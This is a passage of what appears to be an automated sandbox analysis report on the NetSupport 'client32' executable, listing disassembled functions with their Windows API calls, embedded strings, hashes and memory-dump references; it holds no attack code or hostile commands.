Instruction ID: 9ff1e417ae1b924cc4d1e8758e7498bd2614de29c40dd83531f9ec38e2734d9f
Opcode Fuzzy Hash: aa468f9bd3f7d3300ee23661afa10fbea0540181922cf68e47308bcde5dafe8d
Instruction Fuzzy Hash: 454170B5D40209EEEF10DFA48C45BEEB7B5EF05344F80406ADC59E6241E7355A848BAA

Function 110051C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 110051CE
_memset.LIBCMT ref: 110051F0
GetMenuItemID.USER32(?,00000000), ref: 11005204
CheckMenuItem.USER32(?,00000000,00000000), ref: 11005261
EnableMenuItem.USER32(?,00000000,00000000), ref: 11005277
GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005298
SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 110052C4

Strings

0, xrefs: 110051FD

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ItemMenu$Info$CheckCountEnable_memset
String ID: 0
API String ID: 2755257978-4108050209
Opcode ID: 30e732c661686793a5b6a227507d1879ad683f9c8e26dd4348ab49c0c8fb9c12
Instruction ID: 151c37117e6a4efcf468b3f2afefe3ee8c103672a57a50470b6f5af14a9aa5dd
Opcode Fuzzy Hash: 30e732c661686793a5b6a227507d1879ad683f9c8e26dd4348ab49c0c8fb9c12
Instruction Fuzzy Hash: A031A370D0121ABBEB01DFA4D889BEEBBFCEF46358F008159F951E6240E7759A44CB51

Function 68595F20 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 68sleepwindowCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,?), ref: 68595F77
wsprintfA.USER32 ref: 68595FB2
MessageBoxA.USER32(00000000,?,NetSupport,00000004), ref: 68595FC7
Sleep.KERNEL32(00000000), ref: 68595FFF

Strings

_Debug, xrefs: 68595F46
*LineSpeed, xrefs: 68595F41
NetSupport, xrefs: 68595FBC
Limit transmission speed to %d bps?, xrefs: 68595FAC

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: MessageSleepVersionwsprintf
String ID: *LineSpeed$Limit transmission speed to %d bps?$NetSupport$_Debug
API String ID: 1064562911-2508291834
Opcode ID: 3f4b9032d3b7198f967fe48cb3c806fb71422f00c4d357b43de2078ee20fe49a
Instruction ID: 7590790b7016814d3ec6a94e6fba65f781876d7c511816c83a1320df344e4193
Opcode Fuzzy Hash: 3f4b9032d3b7198f967fe48cb3c806fb71422f00c4d357b43de2078ee20fe49a
Instruction Fuzzy Hash: 3B21E771D40114DBDF00DFA4CD59BDD77B4EB45314F9101AAED0AA7280E7309D44CB98

Function 685C9FC7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::UScore.LIBCMT ref: 685C9FD1
DName::DName.LIBCMT ref: 685C9FDD

Part of subcall function 685C7CA8: DName::doPchar.LIBCMT ref: 685C7CD9

UnDecorator::getScopedName.LIBCMT ref: 685CA01C
DName::operator+=.LIBCMT ref: 685CA026
DName::operator+=.LIBCMT ref: 685CA035
DName::operator+=.LIBCMT ref: 685CA041
DName::operator+=.LIBCMT ref: 685CA04E

Strings

void, xrefs: 685CA02D

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
String ID: void
API String ID: 1480779885-3531332078
Opcode ID: ca7b4fa82fc53332c7682243c5238c7ed70021def7a3aaa2e8da33fe7a24c256
Instruction ID: c16303cf2886aca8b78981510544644856b5eb5ed46390a29cfcfe86fc549867
Opcode Fuzzy Hash: ca7b4fa82fc53332c7682243c5238c7ed70021def7a3aaa2e8da33fe7a24c256
Instruction Fuzzy Hash: 0D115EB5900204AFDB06DBA8C859AED7FB4EB41344F85409DD412AB2A1EB709E45CF56

Function 1114F1D0 Relevance: 13.6, APIs: 9, Instructions: 128windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 1114F203
CreateCompatibleDC.GDI32(00000000), ref: 1114F219
SelectPalette.GDI32(00000000,?,00000000), ref: 1114F2FF
CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 1114F327
SelectObject.GDI32(00000000,00000000), ref: 1114F33B
SelectObject.GDI32(00000000,?), ref: 1114F361
SelectPalette.GDI32(00000000,?,00000000), ref: 1114F371
DeleteDC.GDI32(00000000), ref: 1114F378
ReleaseDC.USER32(00000000,?), ref: 1114F387

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Select$CreateObjectPalette$CompatibleDeleteReleaseSection
String ID:
API String ID: 602542589-0
Opcode ID: f9837fefdf0f1fbb5651e24b3a8078af4e21e61c33b31645051b8c91f3a50013
Instruction ID: f8b28bdea48ec2611b1f91f2bbafde9b68da4a4719e2569757cfb30afdba7c1c
Opcode Fuzzy Hash: f9837fefdf0f1fbb5651e24b3a8078af4e21e61c33b31645051b8c91f3a50013
Instruction Fuzzy Hash: 7851DAF5E012299FDB60DF28CD8479DBBB9EF88604F5091EAE609E3240D7705A81CF59

Function 1100D3B0 Relevance: 13.6, APIs: 9, Instructions: 75libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,111918F0), ref: 1100D3C4
GetProcAddress.KERNEL32(00000000,111918E0), ref: 1100D3D8
GetProcAddress.KERNEL32(00000000,111918D0), ref: 1100D3ED
GetProcAddress.KERNEL32(00000000,111918C0), ref: 1100D401
GetProcAddress.KERNEL32(00000000,111918B4), ref: 1100D415
GetProcAddress.KERNEL32(00000000,11191894), ref: 1100D42A
GetProcAddress.KERNEL32(00000000,11191874), ref: 1100D43E
GetProcAddress.KERNEL32(00000000,11191864), ref: 1100D452
GetProcAddress.KERNEL32(00000000,11191854), ref: 1100D467

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 2be2e3181ad7e37179dd4622537a04b9d19e6dc6cc5aab668c0a44b38469d94a
Instruction ID: 9f027eddd4dddc581f186f25ec93b792fa700742cd5a4619bf017c7ec0e1ed24
Opcode Fuzzy Hash: 2be2e3181ad7e37179dd4622537a04b9d19e6dc6cc5aab668c0a44b38469d94a
Instruction Fuzzy Hash: 4B31BBB59122349FE706DBE4C8D5A76B7E9E34C758F00857AE93083248D7F4A881CFA0

Function 1106D060 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 190COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,7E4636A2,?,?,?), ref: 1106D0E2
SetEvent.KERNEL32(?,?,00000000,1106AF10,?,?,?,?,?), ref: 1106D1C2

Strings

erased=%d, idata->dead=%d, xrefs: 1106D293
..\ctl32\Connect.cpp, xrefs: 1106D2AA
Deregister NC_CHATEX for conn=%s, q=%p, xrefs: 1106D0C5

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalEnterEventSection
String ID: ..\ctl32\Connect.cpp$Deregister NC_CHATEX for conn=%s, q=%p$erased=%d, idata->dead=%d
API String ID: 2291802058-2272698802
Opcode ID: 4c4459f730ece1a7db6b629c2ae3fc9ade6f363c06eb62c3d438a519b44550e4
Instruction ID: b22ba82a88fbe9628385044aa67eb00d20c4b44079c4ac5070634ae5489f2a97
Opcode Fuzzy Hash: 4c4459f730ece1a7db6b629c2ae3fc9ade6f363c06eb62c3d438a519b44550e4
Instruction Fuzzy Hash: EE71BC70E00286EFEB15CF64C884F9DBBF9AB04314F0481D9E44A9B291D770E9C5CB90

Function 68596DF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 128networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 68596DFD
#16.WSOCK32(6859A730,?,00000001,00000000,?,6859A730,?,00002000,,?,6859ACF4,00000000,00000000,?,?,00000010), ref: 68596E4C
WSASetLastError.WSOCK32(00002747,?,6859A730,?,00002000,,?,6859ACF4,00000000,00000000,?,?,00000010,00000002,00000001,00000000), ref: 68596F25
WSASetLastError.WSOCK32(00002745,6859A730,?,00000001,00000000,?,6859A730,?,00002000,,?,6859ACF4,00000000,00000000,?,?), ref: 68596F36

Strings

Content-Length:, xrefs: 68596ECC
HTTP/, xrefs: 68596E63
, xrefs: 68596E79

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$_memset
String ID: $Content-Length:$HTTP/
API String ID: 536390146-1146010681
Opcode ID: 7768e075afdc92c5ddb19ff8ccacc7e64668f43ca05df8cb2a7723f4ef129ef0
Instruction ID: 2550b532206b0b9f71c287a4989f745658afb19e23b79d67157d294a612faf31
Opcode Fuzzy Hash: 7768e075afdc92c5ddb19ff8ccacc7e64668f43ca05df8cb2a7723f4ef129ef0
Instruction Fuzzy Hash: 88315E75644381ABEF01996CDC69B7B32E89FA0384FC40028FE3887185FB31D90C81E5

Function 685B0F90 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 121libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 685B0D40: LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,685B0F2B,89DA8021,00000000,?,?,685CF278,000000FF,?,6859AE0A,?,00000000,?,00000080), ref: 685B0D48
Part of subcall function 685B0D40: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 685B0D5B
Part of subcall function 685B0D40: GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-685DCB4C,?,?,685CF278,000000FF,?,6859AE0A,?,00000000,?,00000080), ref: 685B0D76
Part of subcall function 685B0D40: _free.LIBCMT ref: 685B0D84
Part of subcall function 685B0D40: _malloc.LIBCMT ref: 685B0D8C
Part of subcall function 685B0D40: GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,685CF278,000000FF,?,6859AE0A,?,00000000,?), ref: 685B0D9F
Part of subcall function 685B0D40: _free.LIBCMT ref: 685B0DAF

Part of subcall function 685B0970: LoadLibraryA.KERNEL32(ws2_32.dll), ref: 685B09A6
Part of subcall function 685B0970: GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 685B09C3
Part of subcall function 685B0970: GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 685B09CD
Part of subcall function 685B0970: GetProcAddress.KERNEL32(00000000,socket), ref: 685B09DB
Part of subcall function 685B0970: GetProcAddress.KERNEL32(00000000,closesocket), ref: 685B09E9
Part of subcall function 685B0970: GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 685B09F7
Part of subcall function 685B0970: FreeLibrary.KERNEL32(00000000), ref: 685B0A6C

LoadLibraryA.KERNEL32(ws2_32.dll), ref: 685B0FF6
GetProcAddress.KERNEL32(00000000,ntohl), ref: 685B100C
_malloc.LIBCMT ref: 685B1020
_free.LIBCMT ref: 685B10E5
FreeLibrary.KERNEL32(?), ref: 685B10FA

Strings

ws2_32.dll, xrefs: 685B0FEB
ntohl, xrefs: 685B1006

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$Load_free$AdaptersAddressesFree_malloc
String ID: ntohl$ws2_32.dll
API String ID: 4086026317-4165132517
Opcode ID: 652675994e9ca2638da659f913960cd3eafd4819e57afe1a84ecf36e93bc7fff
Instruction ID: 1264cb2477f1a9e93aee7249f305f57be9d6bc3753e4a15d21fb88690baffdd2
Opcode Fuzzy Hash: 652675994e9ca2638da659f913960cd3eafd4819e57afe1a84ecf36e93bc7fff
Instruction Fuzzy Hash: 54417FB59402598BDB64DF24CC646EA73F9BF64304F9084A9D899A3240EF35EE84CFD0

Function 1100F2D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 1100F2FD
std::_Lockit::_Lockit.LIBCPMT ref: 1100F320
std::bad_exception::bad_exception.LIBCMT ref: 1100F3A4
__CxxThrowException@8.LIBCMT ref: 1100F3B2
std::_Lockit::_Lockit.LIBCPMT ref: 1100F3C5
std::locale::facet::_Facet_Register.LIBCPMT ref: 1100F3DF

Strings

bad cast, xrefs: 1100F39C

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: 801cc3ce022a6b056ddab743a2237e93a357ff3796620844a7456d523b295f49
Instruction ID: d39dcf25abbe8801d5c0a0784b2024497f923947b746a9a7221ebbb3b7ea5b8b
Opcode Fuzzy Hash: 801cc3ce022a6b056ddab743a2237e93a357ff3796620844a7456d523b295f49
Instruction Fuzzy Hash: 6F31BF75D042659FDB55DF98C880BAEF7B4EB053B8F40826DD822A7290DB31B904DB92

Function 68591000 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 101COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6859102B

Part of subcall function 685B1B69: __FF_MSGBANNER.LIBCMT ref: 685B1B82
Part of subcall function 685B1B69: __NMSG_WRITE.LIBCMT ref: 685B1B89
Part of subcall function 685B1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,685BD3C1,685B6E81,00000001,685B6E81,?,685BF447,00000018,685D7738,0000000C,685BF4D7), ref: 685B1BAE

Strings

VUUU, xrefs: 6859100D
@, xrefs: 685910BE
base64.cpp, xrefs: 6859103E, 6859105F
pszOut, xrefs: 68591043
cchOut >= cchWorst, xrefs: 68591064
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=, xrefs: 685910E6, 685910F0, 685910FD

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AllocateHeap_malloc
String ID: @$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=$VUUU$base64.cpp$cchOut >= cchWorst$pszOut
API String ID: 501242067-340907830
Opcode ID: 594e49703f45853e724f16429aeaa93b4df3846a8bff557c468b94efaf5904e2
Instruction ID: ea3e22f139199d44e4e5be34ef2fe9a041bda1e28a5b866d3d1f00133f491008
Opcode Fuzzy Hash: 594e49703f45853e724f16429aeaa93b4df3846a8bff557c468b94efaf5904e2
Instruction Fuzzy Hash: 313158769852E89BCB008E6D880169DBBB9ABD2215F4941A7EC54DB301E13AEA06C794

Function 685ABB40 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 95COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 685ABC28

Strings

nUnits>=0, xrefs: 685ABBC0
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 685ABB81, 685ABBDE
NSMString.cpp, xrefs: 685ABB57, 685ABB9D, 685ABBBB, 685ABBFD, 685ABC47
iAt+nUnits<=Length(), xrefs: 685ABC02
iAt>=0 && iAt<Length(), xrefs: 685ABBA2
IsA(), xrefs: 685ABB5C, 685ABB86, 685ABBE3, 685ABC4C

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: IsA()$NSMString.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$iAt+nUnits<=Length()$iAt>=0 && iAt<Length()$nUnits>=0
API String ID: 4104443479-3492528137
Opcode ID: 2edc3ef06d0cafb173af99235b805d3818adba06a137fece085a7ea69c79cc83
Instruction ID: 44d4b73d4fe0fefe29801e707e03a7f7921de2a2ad03d39a92d9e36cd84a5fd6
Opcode Fuzzy Hash: 2edc3ef06d0cafb173af99235b805d3818adba06a137fece085a7ea69c79cc83
Instruction Fuzzy Hash: FB21F73964020AAFDB04EE5CECE1D3E3394DFD9248BD04528FE5C67249DB22BD0546EA

Function 685ABD90 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 90COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 685ABE4B
_memmove.LIBCMT ref: 685ABE56

Strings

NSMString.cpp, xrefs: 685ABDA7, 685ABDC5, 685ABDE3, 685ABDFF, 685ABE75
iAt>=0, xrefs: 685ABDE8
pszStr!=NULL, xrefs: 685ABDCA
iAt<=m_nLength, xrefs: 685ABE04
IsA(), xrefs: 685ABDAC, 685ABE7A

Memory Dump Source

